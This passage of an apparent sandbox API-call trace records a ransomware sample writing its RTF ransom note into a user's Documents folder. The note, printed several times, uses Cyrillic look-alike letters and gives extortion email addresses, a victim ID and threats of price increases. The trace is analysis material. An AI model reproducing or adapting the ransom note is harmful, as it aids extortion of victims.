d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.005] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.006] CloseHandle (hObject=0x1cc) returned 1 [0068.007] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\bg85_info.rtf")) returned 0xffffffff [0068.007] GetLastError () returned 0x2 [0068.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s 